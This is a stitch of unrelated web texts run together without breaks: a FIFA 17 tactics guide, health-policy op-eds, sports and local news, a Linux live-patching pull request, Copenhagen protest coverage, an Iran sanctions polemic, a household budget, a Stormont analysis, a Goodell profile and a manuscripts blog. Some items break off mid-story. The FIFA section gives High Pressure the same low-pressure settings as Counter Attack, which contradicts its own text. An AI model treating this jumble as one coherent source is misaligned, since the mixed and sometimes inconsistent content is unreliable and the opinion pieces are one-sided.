3. Bengio, Y., Goodfellow, I.J., & Courville, A. Deep Learning Book in preparation for publishing with MIT Press. (2015).
FIFA 17 and FIFA 17 Ultimate Team tactics guide and details. Here you can find the complete guide and details on tactics in FIFA 17 and FUT 17.
FIFA 17 Tactic Guide & Details Tactics are available under Team Management menu (Team Management menu is accessible before you play the match). By changing your team's tactic, you can help your team to achieve your goals on the field. In FIFA 17, there are 5 preset tactics, you can also set your own custom tactic using the Custom Tactic option. Below are the details of each setting in preset and custom setting: TACTIC SETTINGS BUILD UP PLAY Speed
The speed in which attacks are put together Values: 1-100 1-33: SLOW
34-66: BALANCED
66-100: FAST Passing
Affects passing distance & support from teammates Values: 1-100 1-33: SHORT
34-66: MIXED
66-100: LONG Positioning
A team's freedom of movement in the 1st two thirds of the pitch Forms: ORGANISED
FREE FORM CHANCE CREATION Passing
Amount of risk in pass decision and run support Values: 1-100 1-33: SAFE
34-66: NORMAL
66-100: RISKY Crossing
The tendency / frequency of crosses into the box Values: 1-100 1-33: LITTLE
34-66: NORMAL
66-100: LOTS Shooting
The tendency / frequency of shots taken Values: 1-100 1-33: LITTLE
34-66: NORMAL
66-100: LOTS Positioning
A team's freedom of movement in the final third of the pitch Forms: ORGANISED
FREE FORM DEFENCE Pressure
Affects how high up the pitch the team will start pressuring Values: 1-100 1-33: DEEP
34-66: MEDIUM
66-100: HIGH Aggression
Affect the team's approach to tackling the ball possessor Values: 1-100 1-33: CONTAIN
34-66: PRESS
66-100: DOUBLE Team Width
Affects how much the team will shift to the ball side Values: 1-100 1-33: NARROW
34-66: NORMAL
66-100: WIDE Defender Line
Affects the shape and strategy of the defence Forms: COVER
OFFSIDE TRAP
DEFAULT Your team's default tactic, reflecting how your team play in attack and defence. TACTIC SETTINGS
Your default tactic settings are based on your team's formations and players. Usually, the default settings are set to moderate and organised.
COUNTER ATTACK tactic in FIFA 17 is best suited for teams trying to defend a lead. Using this tactic, your team will try to defend deep and absorb pressure, getting numbers behind the ball. When possession is won, they will counter by getting players and the ball forward quickly. Teams that play this way often give up a lot of possession to their opposition in exchange of a solid defence. keynotes Your build up play speed is fast
It's recommended to have players with higher PAC (pace) rating especially for the attackers and attacking midfielders
Use finishers with high SHO (shooting) and finishing ratings
PAS (passing) rating of your midfielders is recommended to be high
TACTIC SETTINGS BUILD UP PLAY Speed 95 Passing 50 Positioning Organised CHANCE CREATION Passing 50 Crossing 50 Shooting 50 Positioning Organised DEFENCE Pressure 10 Aggression 50 Team Width 60 Defender Line Cover
HIGH PRESSURE This tactic is good for teams trying to get a goal back later in the match. By using the High Pressure tactic in FIFA 17, your team will defend high up the pitch and mark tightly in an attempt to win the ball early. This tactic is an effective tactic to stop the opposition from having too much time on the ball, but it is more vulnerable to incisive through passes. keynotes The pressure in your defensive line is high
You need the defenders with high DEF rating
It's recommended to have also midfielders with high DEF
PAS (passing) value is also important since the passes for creating chances will be risky
In FUT, you should have a defensive line with green CHM lines (high chemistry) – Especially for setting offside traps
TACTIC SETTINGS BUILD UP PLAY Speed 95 Passing 50 Positioning Organised CHANCE CREATION Passing 50 Crossing 50 Shooting 50 Positioning Organised DEFENCE Pressure 10 Aggression 50 Team Width 60 Defender Line Cover
POSSESSION A good tactic for patient teams comfortable on the ball. Classic possession football. Using this tactic, your team will move up the pitch when the opportunity presents itself, but keeping the ball will be of paramount importance. Players will opt to support more than going on forward runs. This is a tactic used by team who are comfortable on the ball, patient, and like to play a short passing game – A tiki-taka football. keynotes Safe passing is the key
PAS rating of your starting 11 should be high
Skill moves are important – You should be comfortable with FIFA 17 basic skill moves
TACTIC SETTINGS BUILD UP PLAY Speed 20 Passing 20 Positioning Free Form CHANCE CREATION Passing 25 Crossing 25 Shooting 25 Positioning Free Form DEFENCE Pressure 50 Aggression 25 Team Width 50 Defender Line Cover
LONG BALL The best tactic for teams with pacey or shooting in the air strikers. Using FIFA 17 Long Ball tactic, your team will look to play long balls from the defence, either into the space behind the opposing back line, or up to the target man who can bring it down or flick it on for his striking partner. This tactic is best employed by teams with a fast attacker, or attackers that are good in the air. keynotes Passing and long passing are important – Especially for your defenders
Your build up play speed is high
PAC os your strikers should be high
Use preferably tall strikers with high PAC, SHO and finishing ratings
TACTIC SETTINGS BUILD UP PLAY Speed 90 Passing 90 Positioning Organised CHANCE CREATION Passing 75 Crossing 75 Shooting 75 Positioning Organised DEFENCE Pressure 50 Aggression 75 Team Width 50 Defender Line Cover
Aetna announced this week how it's drastically scaling back participation in Obamacare – just like big insurers Humana and United Health have done. Aetna's reasons are the usual ones: not enough healthy people signing up, not enough subsidies, and not able to raise rates to cover their losses. Aetna, Humana, United Health and others have made a sound economic decision that Obamacare is not a right fit for their firms. What puzzles me is how they couldn't, or wouldn't, see this train wreck coming from the beginning.
One thing all insurers do is to hire actuaries and statisticians. Their job is to crunch numbers in order to quantify the insurer's risk – predict the future – if it engages in something such as Obamacare. What did the number nerds miss?
Perhaps they missed seeing a very large pool of chronically ill people who lack healthcare. More specifically, these are people who were denied Medicare or Medicaid disability benefits. For example, many lower-skilled/lower educated people over age 50 exited the workforce during the Great Recession – and opted for disability benefits, including Medicare and Medicaid, as an early-retirement alternative. But not all of them were awarded benefits.
Being denied disability benefits doesn't mean the worker has no need of health care; it means the Social Security Administration decided the worker was either not disabled, or not disabled enough to obtain a job in the national economy commensurate with the worker's education and skills. Common sense indicates the ‘not disabled enough' group would enter the Obamacare system first (and crash the HHS website), with more cohorts entering annually.
One might think examining the ‘not disabled enough' group plus calculating possible growth scenarios is just the type of task that actuaries and statisticians crave. Or were they told by upper management not to look at the negative scenarios, to show the firm's solidarity with President Obama's plan?
Or did the insurers anticipate the negative scenarios and decide to take their chances with a game of chicken with state insurance commissioners – where the insurer threatens to pull out of a market if the commissioner hesitates in allowing premium hikes?
Today, in August 2016, the games of chicken are over, and anything overlooked (intentionally or not) by the number nerds has passed into history.
What remains is a broken and shrinking healthcare system.
Further, I think the Republicans' chances of ‘repeal and replace' are slim. ‘Repeal and replace' works as a sound bite, but not as a policy solution. To bring about ‘repeal and replace' Republicans would need to have the White House, plus hefty majorities in the Senate and the House. The Vegas odds on that happening would be very, very long.
The ‘known unknown' is whether the House and Senate can compromise on an Obamacare fix that would make convince younger people that the benefits of purchasing healthcare insurance justifies the cost.
A House-Senate solution would be hard for a President of either party to reject, although rejection is a negative scenario too.
To reach a compromise, House Speaker Paul Ryan would have to give up his love for vouchers that shrink, while Senate Democrats and some Republicans would have to admit, for example, how a ‘free' mammogram requirement forces women in their twenties to pay for a procedure they don't need or use and inflates premiums.
Hillary Clinton said ‘it takes a village to raise a child.' When it comes to legislating, it usually takes a train wreck to get the House and Senate to the negotiating table. Aetna's slip-sliding away is a huge indicator that Obamacare is heading for a train wreck. And nobody needs an actuary, statistician or any other sort of number nerd to see this one coming.
Joanne Butler is a former staffer at the United States House Committee on Ways and Means. You can email her at joanne-butler@comcast.net.
Ultimate frisbee competitors battle it out for spot at national championships
Updated
While throwing a frisbee around is normally associated with games played in a park or on a beach, for some it has become a serious pursuit.
Ultimate frisbee has about 6,000 regular competitors nation-wide, with Canberra playing host to just under 1,000.
This weekend, more than 300 players from over 20 teams in New South Wales and the ACT descended on the capital, to battle it out for their spot in the national championships.
ACT Ultimate Association president Jason de Rooy said ultimate frisbee originated in the United States in the 1960s.
"People here have told me they began playing ultimate in Canberra in the early 1980s," he said.
"But it started to really take root here in the 1990s at the ANU [Australian National University].
"And in the last three or four years it's really gone through the roof."
Canberra's premier women's team Factory won their match against Newcastle's Sugar Magnolias, securing their place at the national championships in Ballarat.
Captain Liz de Hoog said the game was "the perfect combination of athleticism, skill and strategy".
"It is a relatively new sport... and it's really high-paced," she said.
"There's also a strong team element and I think that's what keeps people coming back.
"Women's ultimate is also really growing, and we're really pleased to have two teams in Canberra."
At the end of each game, both teams come together in a huddle for a "spirit circle".
"We talk about the game, we talk about what we like about the other team," de Hoog said.
"Sometimes we give the most valuable player a prize as well."
The game also does not have a referee or umpire, and works mostly on an honesty system.
Canberra men's team Fyshwick United player Michael Hatfield said players made their own calls and if it was disputed, play went back to before it was contested.
"You don't get anywhere near as much of the hatred between teams," he said.
"You make good plays and there's rivalry, but you enjoy hanging out as well.
"Because there's such a tight culture and you all know each other, you don't want to be known as a cheater... so that helps regulate the game."
Hatfield has represented Australia in the unique sport, playing overseas in Italy.
"The common comparison is that it's like Gridiron - in that you score in an end-zone, crossed with Netball - because you can't run with the frisbee, with the free-flow running of AFL," he said.
"But the way the frisbee moves is entirely different to any other sport, the way it flows and the way the wind affects the game is different to any other ball sport."
Two Sydney teams - Colony Pillage and Rogue Resistance - took out the top spots in the regional championships, with Canberra's women's team Factory taking out third place and men's team Fyshwick United coming seventh.
Topics: sport, community-and-society, canberra-2600, act, nsw
First posted
Pennsylvania has been given the opportunity to expand Medicaid to cover approximately half of its 1.3 million uninsured residents. The Affordable Care Act gives states the option of expanding Medicaid to families earning up to 133% of the federal poverty limit. The federal government would pay all of the costs of expansion until 2017; after it would drop down to 95% and then 90% permanently. If Pennsylvania expands the program in 2014, the state would receive an additional $3.5 billion in federal Medicaid funds. Once Medicaid expansion is fully implemented, every $1 Pennsylvania invests in the system is estimated to result in $13 from federal funds.
There are apparent economic benefits of Medicaid expansion in Pennsylvania. A study done by the Independent Fiscal Office, a neutral organization that provides revenue projections for use in the state budget process, found that Medicaid expansion will produce $430 million for the state budget between 2016-2021. Additionally, it would support and add thousands of jobs. The increased funding and jobs have the potential to dramatically increase economic activity in the state—by $5.1 billion in 2016. Lastly, with more Pennsylvanians insured, there will be less “uncompensated care costs” that the state, localities, and hospitals have to pay.
Originally, the Affordable Care Act required all states to expand Medicaid. However, the Supreme Court ruled last summer that each state can choose whether or not to expand. 26 states have already committed to expanding, some of them with republican governors like New Jersey, Arizona and Florida. Each of these governors realizes how foolish it would be to leave federal money on the table instead of using it to insure Americans.
Governor Corbett said during his budget address on February 5th that Pennsylvania would not be participating in Medicaid expansion. However, support from both sides of the aisle and several studies that have found numerous benefits of expansion have shifted Pennsylvania from a “no” state to a “question mark'” state.
Our governor has developed many faulty reasons for Pennsylvania to opt-out of Medicaid Expansion. Many of these excuses are not supported by any evidence, analysis, or study. None of them explain a better alternative that would provide coverage for the Pennsylvanians that would be left behind without expansion.
With the gubernatorial elections next year, it seems that Governor Corbett may be using Medicaid expansion as a bargaining tool. The health of Pennsylvanians should not be used as a means for political power. It would be absurd for the state to pass up the opportunity to insure more Pennsylvanians with little cost to the state.
Comments
comments
[GIT PULL] Live patching for 3.20
Linus,
Live patching core is available for you to pull at
git://git.kernel.org/pub/scm/linux/kernel/git/jikos/livepatching.git for-linus
Let me provide a bit of history first, before describing what is in this
pile.
Originally, there was kSplice as a standalone project that implemented
stop_machine()-based patching for the linux kernel. This project got later
acquired, and the current owner is providing live patching as a
proprietary service, without any intentions to have their implementation
merged.
Then, due to rising user/customer demand, both Red Hat and SUSE started
working on their own implementation (not knowing about each other), and
announced first versions roughly at the same time [1] [2].
The principle difference between the two solutions is how they are making
sure that the patching is performed in a consistent way when it comes to
different execution threads with respect to the semantic nature of the
change that is being introduced.
Complete Story
Related Stories:
“The goal is not to hold a street demonstration, but to make it to the targets and disrupt them,” a copy of the instructions read.
A heavy police presence could be seen at a number of the potential targets, and police helicopters could be seen moving across various parts of the city.
As of 2 p.m. local time, 68 arrests had been made, a police spokeswoman said.
Agnes Galube, 26, was among several protesters handcuffed at Kampmannsgade and Vester Sogade Streets. She said she was being detained for having paint cans in her bag, though she added that they were empty and that protesters were using them as rattles.
Photo
Per Larsen, chief coordinator for the Danish police, called the protesters' plans “a very well-planned operation.”
But, he added, “You have never seen such a police presence in this city before. I think we will have things under control.”
He said the police had received only one report of vandalism — a broken storefront window.
A standoff took place at the east end of Queen Louise Bridge, where protesters tried to crose Peblinge Lake and move closer to the city center. The police surrounded the crowd at the bridge while other demonstrators shouted, “Our climate is not your business!”
Newsletter Sign Up Continue reading the main story Please verify you're not a robot by clicking the box. Invalid email address. Please re-enter. You must select a newsletter to subscribe to. Sign Up You will receive emails containing news content , updates and promotions from The New York Times. You may opt out at any time. You agree to receive occasional updates and special offers for The New York Times's products and services. Thank you for subscribing. An error has occurred. Please try again later. View all New York Times newsletters.
Police dogs were brought to the scene to move the crowds back, and the police made a handful of arrests before everyone scattered. Some protesters could be heard shouting that the police were being unnecessarily aggressive.
But Mr. Larsen said the complaints were unfounded.
“Of course we have spoiled a little bit of their plans, but the meaning of their action today was to try to damage their targets, and so we've prevented that,” he said.
Advertisement Continue reading the main story
Michael Christian Storgaard, a spokesman for Maersk, a major shipping company that has its headquarters in Copenhagen, said that employees had been warned this week to expect potential demonstrations.
“In an internal message, we have advised our employees that we may have to close the access to and from the building during these demonstrations,” Mr. Storgaard said in an e-mail message. “Apart from that we have not taken any more drastic precautions.”
On Wednesday, the police seized nearly 200 makeshift shields, scores of paint bombs and other equipment, including nine platforms with crude staircases, during a raid on a building that city officials had provided as free housing for activists visiting Copenhagen during the climate talks.The police said they believed that the demonstrators intended to use the stairs to vault over barricades outside the conference center, and the shields to protect themselves.
“It tells us that we are facing a group of people who are ready to use civil disobedience and that they are ready to do vandalism,” Mr. Larsen said Wednesday.
On Saturday, a march is planned from the city center to the United Nations meeting place.
Here's some interesting new data from Jaison Abel and Richard Dietz of the Federal Reserve Bank of New York. The vast majority of U.S. college grads, they find, work in jobs that aren't strictly related to their degrees:
There are two different things going on in this chart. First, a significant number of college grads appear to be underemployed: In 2010, only 62 percent of U.S. college graduates had a job that required a college degree.
Second, the authors estimated that just 27 percent of college grads had a job that was closely related to their major. It's not clear that this is a big labor-market problem, though — it could just mean that many jobs don't really require a specific field of study. (You can find Abel and Dietz's longer paper here, and note that they are excluding people with graduate degrees in this second chart — so no doctors, lawyers, college professors, etc.)
There's an important twist here, too. The chances of finding a job related to your degree or major go up a few points if you move to a big city:
The authors' argument is that "big cities have more job openings and offer a wider variety of job opportunities that can potentially fit the skills of different workers." The odds of finding a match between college degree and job are about 6 percentage points higher in a place like New York City than in, say, Syracuse.
Of course, a key caveat here is that landing a job unrelated to your major isn't necessarily the end of the world. Indeed, it's the most common outcome by far. (My specific math degree doesn't really come in handy for journalism all that often, but college itself was still useful.)
The research does, however, hint at one possible advantage of large cities — and might help explain why workers in denser cities tend to be more productive. If there's a policy upshot here, it's that the broader economy could stand to benefit if large cities loosened up some of their restrictions on housing and made it easier for more people to live there — a point that writers like Matt Yglesias and Edward Glaeser have made over and over again.
Related: Maybe college isn't for everyone. But it's probably for you.
TRENTON -- The results of controversial standardized tests that many New Jersey students have yet to pass will carry three times as much weight in some teacher's evaluations this school year, the state announced Wednesday.
Teachers in grades 4-7 whose students participate in the PARCC math tests or in grades 4-8 whose students take PARCC English exams will have 30 percent of their rating based on students' performance on the tests, an increase from 10 percent, Deputy Education Commissioner Peter Shulman said in a memo to schools.
The teacher evaluations take into account how much a teacher's students improved their scores on the annual PARCC exams. So, a teacher whose students earn low test scores can still get a boost in his or her performance rating as long as the students made progress compared to their peers, according to the state.
"As New Jersey now enters into its third year of PARCC testing, schools have successfully transition to the new exams," Shulman wrote in the memo. "The PARCC assessment can be used as a tool to improve classroom instruction more effectively than any previous statewide assessment."
About 15 percent of New Jersey educators will have PARCC results factored into their evaluations, state Department of Education spokesman Mike Yaple said.
The New Jersey Education Association, the state's largest teachers union and a fervent opponent of the exams, immediately condemned the change and criticized Gov. Chris Christie for the decision.
Tripling the weight of PARCC in teacher evaluations will lead to more time spent on test preparation and less time dedicated to "real teaching and learning," NJEA President Wendell Steinhauer said.
"Christie's decision to cling to his failed test-and-punish approach shows that he is out of touch with the needs of students," Steinhauer said.
Student performance on standardized tests was added as a factor in some teacher evaluations beginning in the 2013-14 school year as part of New Jersey's landmark tenure reform law.
The weight of student test scores in teacher evaluations was dropped from 30 percent to 10 percent in 2014-15 when New Jersey switched to the new PARCC exams, short for Partnership for Assessment of Readiness for College and Careers (PARCC).
New Jersey's statewide scores improved on nearly every exam during the second year of PARCC testing, but the majority of students in grades 4-8 still failed to meet grade level expectations.
Adam Clark may be reached at adam_clark@njadvancemedia.com. Follow him on Twitter at @realAdamClark. Find NJ.com on Facebook.
Article 33 of the Fourth Geneva Convention: “No general penalty, pecuniary or otherwise, shall be inflicted upon the population on account of the acts of individuals for which they can not be regarded as jointly and severally responsible.”
The Guardian reports that “Hundreds of thousands of Iranians with serious illnesses have been put at imminent risk by the unintended consequences of international sanctions, which have led to dire shortages of life-saving medicines such as chemotherapy drugs for cancer and bloodclotting agents for haemophiliacs.”
The key word there is “unintended.” The problem with describing it this way is that it isn't accurate. Washington understands the consequences of the sanctions, and the same Guardian report acknowledges that the Obama administration has been made aware that hundreds of thousands of sick people in Iran have had their access to medicine restricted because of the sanctions. And they haven't done anything about it.
“The west lies when it says it hasn't imposed sanctions on our medical sector. Many medical firms have sanctioned us,” Naser Naghdi, the director general of Iran's biggest pharmaceutical company, told the Guardian.
But sanctions aren't just blocking much needed medical supplies; unemployment is rising and inflation is spiraling out of control. “Prices of fruit and sugar, among other staples, have soared – in some cases showing threefold and fourfold increases,” Saeed Kamali Dehghan wrote in the Guardian last summer. “The price of meat, an essential ingredient of Iranian food, has gone up to such an extent that many now eat it only on special occasions.”
“What is most concerning,” according to Trita Parsi, president of the National Iranian American Council, “is that it is now increasingly clear that the people are the target.” Parsi added that “in a non-democracy, such as Iran, the ability for people to pressure their government is limited,” and that “Many in Washington acknowledge that we are conducting economic warfare. That means the entire Iranian economy is the battlefield – and ordinary Iranians are [seen as] enemy combatants.”
Secretary of Defense Leon Panetta has admitted sanctions aren't demonstrably changing the policies of the regime, but has insisted on their continuance nevertheless. As one of the top congressional supporters of sanctions, Rep. Brad Sherman (D-CA), said, “Critics [of the sanctions] argued that these measures will hurt the Iranian people. Quite frankly, we need to do just that.” Or take Rep. Gary Ackerman (D-NY): “The goal … is to inflict crippling, unendurable economic pain over there. Iran's banking sector — especially its central bank — needs to become the financial equivalent of Chernobyl: radioactive, dangerous and most of all, empty.”
One of the major atrocities of all of post-WWII US foreign policy was the American-led sanctions on Iraq, which ended up killing hundreds of thousands of Iraqis. We heard the same odious rationales for the sanctions on Iraq as we are now hearing for the sanctions on Iran. Denis Halliday, UN Humanitarian Coordinator in Baghdad, insisted the effect of the Iraq sanctions “fit the definition of genocide.”
We may be seeing this repeat in Iran. And for what? It can't be punishment for a rogue nuclear weapons program: the US intelligence community has concluded it doesn't exist. Whether the reason behind the sanctions are to placate Israeli security concerns or to block Iran's regional influence, what matters is that this economic warfare is criminal; it violates the Fourth Geneva Convention.
But apparently President Obama – Nobel Peace Prize winner – doesn't care about legally binding international treaties and conventional laws. Instead, he is busy implementing the collective punishment of Iranians for a crime they haven't committed.
Image: Matthew Henry
As a major part of our blog, we want to share exactly how we budget and how we're doing follow that budget. A lot of other financial material shares vague rules like spending no more than 33% of your income on housing, however many dollars per person per week for groceries, or whatever, but we want to show the actual amounts down to the dollar. For most categories, we roll over unused (or overused) amounts to the next month. This allows us to save responsibly and help account for month-to-month swings in things like gas and groceries.
Category Monthly Budget Amount left Tithes/Charity 750 1573 Rent 1150 1150 Electric 65 144 Phone 10 4 Internet 35 -15 Groceries 230 47 Restaurants 120 103 Clothing 60 124 Cleaning/Laundry 10 127 Gas & Travel Expenses 135 -28 Repairs & Tires 120 100 Car Replacement 70 1410 Other Medical 80 -256 Entertainment 70 148 Vacation 70 -97 Rental Insurance 0 0 Auto Insurance 167 167 Toiletries 10 80 Cosmetics/Hair Care 15 45 Gifts 140 558 Furniture/ Household 75 363 Tyler Pocket Money 50 94 Nicole Pocket Money 50 198 Nicole Student Loan 197 4 Tyler Private Loan 322 1 Tyler Federal Loan 194 -3 Car Loan 1100 0 Miscellaneous 165 229 Fitness 5 303 Baby Things 50 32 Daughters Health Insurance 87 87 Water 40 153 Gas 70 48 Daycare 750 565
This is a mid-month look, which is why a few items (like Tithes/Charity, Daycare, and Auto Insurance) have a lot left. A few categories have a bunch built up, where we've been saving for a while. We're hoping both of our cars will last quite a while, but we're building up our car replacement fund so that we can buy a car with cash or at least have a very good down payment when we need a new one. For furniture and household, we actually just got a really good deal on some nice living room chairs on Craigslist, so that category is down to around $250 now.
We have a few categories we're not happy with and need to work on. Our Other Medical category is running low because our FSA ran out earlier than expected this year. Gas and Travel is difficult to pin down. Our families live in another state, so trips to go see them really eat at our budget there. And vacation was built up, but we were just lucky enough to make a trip to a friend's wedding into a mini-vacation for us and went a little over budget. We try to live conservatively enough that when we do go over we have a cushion in our bank account, and we can keep saving up. We'll just have to take a little longer to save for our next trip.
By Mark Simpson
BBC Ireland correspondent
Relations between Peter Robinson (left) and Martin McGuinness have soured Just as the people of Northern Ireland are catching their breath after the extraordinary revelations about the marital difficulties of Peter and Iris Robinson, another relationship crisis is about to hit the headlines. The Stormont coalition between Sinn Fein and the DUP is heading towards breaking point, and looks increasingly unlikely to survive. As a story, it is much less colourful, and may not excite the tabloid editors and readers, but it could be immeasurably more important. For the past five days, the media and the public have been obsessed with the Robinson saga. Is there anyone from Northern Ireland reading this that wasn't talking about it at the dinner table during the weekend? Is there anyone living in Belfast who hasn't heard a cruel Iris Robinson joke? Or received an Iris Robinson-inspired text message? Thought so. The next story to break is unlikely to lead to such a frenzy, but it could have repercussions for years to come. Nightmare scenario The demise of the Stormont power-sharing executive is looking a real possibility in the coming days. Predicting the future in Northern Ireland is a dangerous game, but here's the nightmare scenario for supporters of power-sharing. In the next week, either First Minister Peter Robinson is ousted from office, or Deputy First Minister Martin McGuinness withdraws from office, in protest at the DUP's failure to agree to the devolution of policing and justice powers. Under the law, they would both lose their jobs. It's a joint office; if one goes, both go. The rules state that when the office becomes vacant, the parties at Stormont are given seven days to elect a new First and Deputy First Minister. The DUP and Sinn Fein have been arguing about the devolution of policing There would then be a week to save Stormont. Round-table talks could be called, and a stately home in the country could be booked to concentrate the parties' minds - and keep the media at bay. However, does anyone realistically believe that the parties could sort out in seven days the issues that they have been arguing about for the past two years? On second thoughts, cancel that stately home. If there is no agreement in the seven-day rescue period, this would then trigger an Assembly election. It would be up to the Northern Ireland Secretary Shaun Woodward to set the date. The legislation does not give a precise time-scale. Given that an election could potentially make the prospect of a reconciliation between Sinn Fein and the DUP even more remote, Mr Woodward might be in no rush to send the parties to the polls. However, he could eventually be forced to call an immediate poll by a court challenge. So then it could be an Assembly election in March, followed by a quick breather, and then a Westminster election in May. Before you know it, it's the summer marching season. Rule change If all of the above occurs, it is difficult to imagine any serious talks before September. At the same time, dissident republicans are planning and plotting in the shadows, and their spokespersons are telling the media "Sinn Fein got it wrong, politics doesn't work". For those who want the Stormont Assembly to survive, it's a grim scenario but it's not as far-fetched as many would like to believe. Mind you, veteran watchers of the peace process know that just because the rules say there has to be an Assembly election doesn't mean that there will be one. When the rules don't suit, they can be changed. It has happened before. But back to this week. It is going to take something extraordinary to happen in the coming days to prevent either Peter Robinson or Martin McGuinness leaving office. The truth is that the relationship between the DUP and Sinn Fein has not been working for some time. Decision-making has been frozen for months. If your computer screen were now to freeze, you would be left with little option but to pull the plug and try to reboot. Stormont seems to be in a similar position. The only question appears to be whether it is a seven-day reboot or a long, slow overhaul. At this stage, the more likely scenario is the latter.
Bookmark with: Delicious
Digg
reddit
Facebook
StumbleUpon What are these? E-mail this to a friend Printable version
Pats fans have company in their distaste for the commissioner. Goodell has come under blistering public criticism, periodic calls for his resignation and a procession of rebukes in court over a host of incidents and scandals — each knowable in shorthand (Ray Rice, Adrian Peterson, the various ‘‘-gates''). He is booed every year at the N.F.L. draft. There are sports bars with dartboards featuring his likeness. Goodell's high profile is itself a testament to football's runaway prosperity and popularity. ‘‘It's like the old saying,'' the Houston Texans' owner, Robert C. McNair, told me. ‘‘The higher up the palm tree the monkey climbs, the more of his ass is exposed.'' McNair laughed. He supports Goodell, although he thinks his astronomical salary makes him a target of easy resentment ($44 million in 2012 and $35 million in 2013 in salary and bonuses, the last years those numbers were available).
Every chief-executive job involves political duties, but watching Goodell, who is 56, evokes a most familiar mastery. I live in Washington and usually write about politics; Goodell — whose father, Charles Goodell, was a senator from New York — seems very much of that world. On camera, Goodell can come off as tight, smug and sanctimonious — a politician, and not a particularly compelling one. Since the Ray Rice domestic-violence scandal of 2014, he rarely speaks to the news media in unsafe settings. He repeats himself often and recites talking points. ‘‘We'd like to see him more relaxed and smiling and answering the questions,'' McNair said. ‘‘You know, he's got all these legal advisers telling him you can't say this or you can't say that.''
But as he worked the stadium from midfield before the N.F.C. championship game, Goodell's schmoozing genes were elite. He moved among his constituents in a former jock's ballet of bro-hugs and two-handed handgrips, punctuated with backslaps. He received guests, laughing easily if not for real. Goodell made sure to seek out Panthers executives, the Cardinals' owner, referees and each head coach.
‘‘Come on, let's walk,'' Goodell told me. ‘‘If we don't get away from the crowd, we'll never get this done.'' Goodell said he spends many N.F.L. Sundays watching games at home in Bronxville, north of New York City. He boasted about his man cave equipped with three TVs, which he watches simultaneously while checking multiple laptops. He watches as a fan, as the commissioner and as a micromanager, firing off emails, making calls to his staff about everything from a referee's call to something an announcer said to a promotion he caught that should not have aired. Goodell told me he spends most weekends watching game after game of football — pro, college and even high school. I asked him if he had seen ‘‘Concussion,'' the Will Smith film about the devastating toll of head injuries in N.F.L. players and the league's complicity in either ignoring or covering up the problem. Goodell said he would get around to it. ‘‘I can't tell you the last time I've been to a movie,'' he told me, although in the next breath he said he had seen ‘‘The Intern,'' starring Robert DeNiro, with his twin teenage daughters during the snowstorm the night before. Goodell then shoveled out his driveway so he and his wife could go to Soul Cycle on Sunday morning before he flew down to Charlotte via N.F.L. corporate jet. He likes people to know that he's a workout fiend. He gets up at 5:30, does his weights and cardio and gets ‘‘jazzed up'' to start his day. He has no visible belly but always seems to be flexing his torso under tight blue suits. Goodell also likes it known that he used to play football in high school, and he appears to be especially energetic around N.F.L. players in their workplace.
More and more, the commissioner's job is to serve as a protective buffer for the Membership. He talks about head injuries so that the owner of, say, the Buffalo Bills does not have to. No one called for the resignation of the Ravens' owner, Steve Bisciotti, after the video of Ray Rice knocking out his girlfriend in an Atlantic City elevator went public. Goodell testified before Congress on concussions in 2009 and listened to Representative Linda T. Sánchez of California compare the N.F.L. to the tobacco industry for its indifference to the physical harm being done to its players. ‘‘He is smooth, very smooth,” Jerry Jones said of Goodell. ‘‘I'd say he's very classy. You see that kind of discipline and refinement.''
Goodell was the middle of five boys born in seven years to Jean and Charles Goodell. His father was a moderate Republican congressman who was appointed to succeed Senator Robert F. Kennedy after Kennedy's assassination in 1968. Charles Goodell was a favorite of President Richard M. Nixon until he turned against the Vietnam War and introduced a bill to end it. The White House then turned against Goodell and worked to defeat him in the 1970 election. Roger, only a boy, followed his father everywhere on the campaign trail. From this, the commissioner learned the value of making tough and principled decisions, he says. He keeps a copy of his father's Vietnam Disengagement Act on the wall of his office.
Books which belonged to medieval women are relatively rare survivals. Our exhibition, Royal Manuscripts: The Genius of Illumination, assembles a fascinating assortment of books made for, and owned by, aristocratic women. Some of these books are personalised, with contents chosen, or even written, for a specific female recipient. Certain manuscripts contain inscriptions in the hands of their female owners, or record in the calendar the events that shaped the fortunes of their families.
The book's female owner kneeling as a supplicant before the Virgin and Child, Lansdowne 383, f. 165v.
The manuscript known today as the Shaftesbury Psalter (Lansdowne 383) is the earliest example in our exhibition of a book made for a woman. Though this Psalter's original owner has not left any marks of identification, it seems to have been created with a specific owner in mind.
It was once supposed that the book was made for a female aristocrat connected to the nunnery of Shaftesbury (Dorset). One of the nunnery's patron saints was Edward the Martyr (d. 978), an Anglo-Saxon king who was murdered on the orders of his stepmother, Ælfthryth, and succeeded by his half-brother, the infamous Æthelred the Unready. Edward's body was disposed of unceremoniously after his murder, but his remains were eventually interred at Shaftesbury. The mention of St Edward in the calendar and litany might suggest that this Psalter was intended for use at the nunnery.
Calendar page for March, containing the feast day of St Edward the Martyr, Lansdowne 383, f. 4.
This supposition is challenged, however, by the prominent textual presence of St Lambert, Bishop of Maastricht, who was martyred in 705. It is difficult to explain why a Shaftesbury nun should cherish a particular devotion to this Netherlandish saint. On the other hand, it is quite credible that this Psalter could have been copied from a Shaftesbury model for an aristocratic woman who hailed from the Netherlands. Some scholars have therefore concluded that this book may have been made for Adeliza of Louvain (d. 1151).
Adeliza was the second wife of King Henry I of England (r. 1100-1135). Henry is notorious for having fathered a large number of illegitimate children. In 1120, his only legitimate male heir, William Ætheling, drowned when the White Ship was shipwrecked in the English Channel. Left without a clear line of succession, Henry remarried in 1121 and set about trying to father an heir with his young and, it is said, very beautiful new wife, Adeliza. He did not succeed.
An aristocratic woman, possibly Adeliza of Louvain, kneeling before Christ, Lansdowne 383, f. 14v.
Adeliza had no children during her marriage to Henry, but in her time as queen she did establish herself as a patron of Anglo-Norman poetry. Philippe de Thaon dedicated to the young queen his Bestiaire, an Anglo-Norman verse translation of the Latin bestiary, while the popular Anglo-Norman Voyage of St Brendan was rededicated to her (its original patron was Matilda, Henry's first queen). Adeliza may also have commissioned a verse biography of her royal husband, though it does not survive.
After Henry's death in 1135, England was plunged into civil war. Within a few years of the king's death, Adeliza married Henry's hereditary butler, William d'Aubigny (d. 1176), and subsequently gave birth to seven children who survived to adulthood. If this Psalter belonged to Adeliza, it would have seen her through the later years of her life, in which she raised a family amid England's political tumult, before retiring to the Flemish monastery at Affligem, where she died in 1151.
- Royal project team
CLEVELAND, Ohio - FirstEnergy's architecturally impressive Lake Shore power plant degraded so much in condition after it closed in phases starting in 2012 that it can't be preserved and reused.
So said officials of the utility Wednesday during a tour of the 57-acre plant, which overlooks Lake Erie and the I-90 Shoreway at East 72nd Street.
The FirstEnergy engineers said they knew of London's Tate Modern museum, which turned the decommissioned Bankside power plant on the Thames River into one of the world's most spectacular contemporary art venues.
